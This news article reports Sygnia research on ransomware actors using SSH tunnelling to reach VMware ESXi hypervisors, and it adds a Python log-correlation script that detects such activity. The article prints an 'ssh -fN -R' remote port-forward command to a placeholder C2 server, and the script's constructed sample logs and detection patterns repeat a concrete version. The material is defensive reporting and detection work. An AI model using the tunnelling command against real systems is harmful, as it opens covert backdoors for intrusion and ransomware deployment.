Cybercriminals use SSH tunnelling to access VMware ESXi

Ransomware actors targeting ESXi bare-metal hypervisors are using SSH tunnelling to access the system without being detected.

VMware ESXi devices play a crucial role in virtual environments, because a single physical server can run many of an organization's virtual machines.

Sygnia's research shows that these systems are often barely monitored, which makes them a target for hackers seeking access to corporate networks. Once inside, attackers can steal data and encrypt files, crippling an entire company by making all of its virtual machines inaccessible.

Exploiting security vulnerabilities

Cybersecurity firm Sygnia reports that criminals often achieve compromise by exploiting known vulnerabilities or compromised administrator credentials.

ESXi has a built-in SSH service that allows administrators to manage the hypervisor remotely via a shell. According to Sygnia, ransomware actors abuse this feature to achieve persistence, move laterally and deploy ransomware payloads. Since many organizations do not actively monitor SSH activity on ESXi, attackers can use it covertly.

Setting up tunnelling is easy

Once hackers are on the device, setting up tunnelling is simple: they can use ESXi's native SSH functionality or deploy other commonly used tools with similar capabilities, explains a Sygnia spokesperson.

For example, by using the SSH binary, remote port-forwarding to the C2 server can easily be set up with the following command:

`ssh -fN -R 127.0.0.1:<SOCKS port> <user>@<C2 IP address>`.

Sygnia notes that because ESXi hosts are resilient and rarely shut down unexpectedly, such a tunnel acts as a semi-persistent backdoor within the network.

Flaws in logging

Sygnia also points to the difficulty of monitoring ESXi logs, which creates significant visibility gaps that ransomware actors exploit.

Unlike most systems, where logs are aggregated into a single syslog file, ESXi distributes logs across multiple dedicated log files. Thus, finding evidence requires merging information from multiple sources.

The security firm recommends system administrators check the following four log files to detect SSH tunnelling and ransomware activity.

– `/var/log/shell.log` → Tracks command execution in the ESXi Shell
– `/var/log/hostd.log` → Logs administrative activities and user authentication
– `/var/log/auth.log` → Records login attempts and authentication events
– `/var/log/vobd.log` → Contains system and security events

The files `hostd.log` and `vobd.log` probably also contain traces of changes to firewall rules, since modifying those rules is typically necessary for maintaining persistent SSH access.

It is important to note that ransomware actors often erase logs to remove evidence of SSH access, alter timestamps or truncate logs to confuse investigators. Finding evidence is therefore not always easy.
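The merging step Sygnia describes can be automated. The script below is an added illustration, not Sygnia's tooling: it reads lines from the log files above into one timeline and flags a remote port forward that is preceded, within a short window, by an SSH login and a firewall-rule change. All sample lines and the hostd message layout are constructed for the example; real line formats vary between ESXi versions.

```python
import re
from datetime import datetime, timedelta, timezone

# Constructed sample lines (not real captures). Their shape approximates
# "<ISO timestamp> <process>[pid]: <message>", as found in the ESXi files above.
SAMPLE_LOGS = {
    "/var/log/auth.log": ["2025-01-20T08:01:10Z sshd[2101]: Accepted password for root from 192.0.2.10 port 51000 ssh2"],
    "/var/log/hostd.log": ["2025-01-20T08:02:00Z hostd[2000]: info Task Created : haTask-ha-host-vim.host.FirewallSystem.enableRuleset"],
    "/var/log/shell.log": [
        "2025-01-20T08:02:03Z shell[2102]: [root]: esxcli network firewall ruleset set -e true -r sshClient",
        "2025-01-20T08:02:30Z shell[2102]: [root]: ssh -fN -R 127.0.0.1:1080 svc@203.0.113.5",
    ],
}

LINE_RE = re.compile(r"^(\S+Z) (\w+)\[\d+\]: (.*)$")

# Message patterns worth flagging; the rule names are labels chosen for this example.
RULES = [
    ("ssh_login", re.compile(r"^Accepted \S+ for \S+ from \S+")),
    ("firewall_change", re.compile(r"firewall ruleset set|FirewallSystem", re.I)),
    ("ssh_remote_forward", re.compile(r"\bssh\b.*\s-\w*R\b")),
]

def merge_logs(logs):
    """Parse every file's lines into a single timeline sorted by timestamp."""
    events = []
    for path, lines in logs.items():
        for line in lines:
            m = LINE_RE.match(line)
            if m:  # lines not in the expected shape are skipped
                ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
                events.append({"ts": ts, "file": path, "msg": m.group(3)})
    return sorted(events, key=lambda e: e["ts"])

def detect(events):
    """Return (timestamp, file, rule) for every event whose message matches a rule."""
    return [(e["ts"], e["file"], name) for e in events for name, pat in RULES if pat.search(e["msg"])]

def tunnel_chains(findings, window_minutes=10):
    """Remote forwards preceded, within the window, by both a login and a firewall change."""
    window = timedelta(minutes=window_minutes)
    hits = []
    for ts, path, rule in findings:
        if rule != "ssh_remote_forward":
            continue
        earlier = {r for t, _, r in findings if ts - window <= t < ts}
        if {"ssh_login", "firewall_change"} <= earlier:
            hits.append((ts.isoformat(), path))
    return hits
```

Call `tunnel_chains(detect(merge_logs(SAMPLE_LOGS)))` to run it over the constructed sample; on a real host, replace `SAMPLE_LOGS` with the contents of the four files.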

Recommendations

It is strongly recommended that organizations centralize ESXi logs via syslog forwarding and integrate them into a Security Information & Event Management (SIEM) system to detect anomalies.
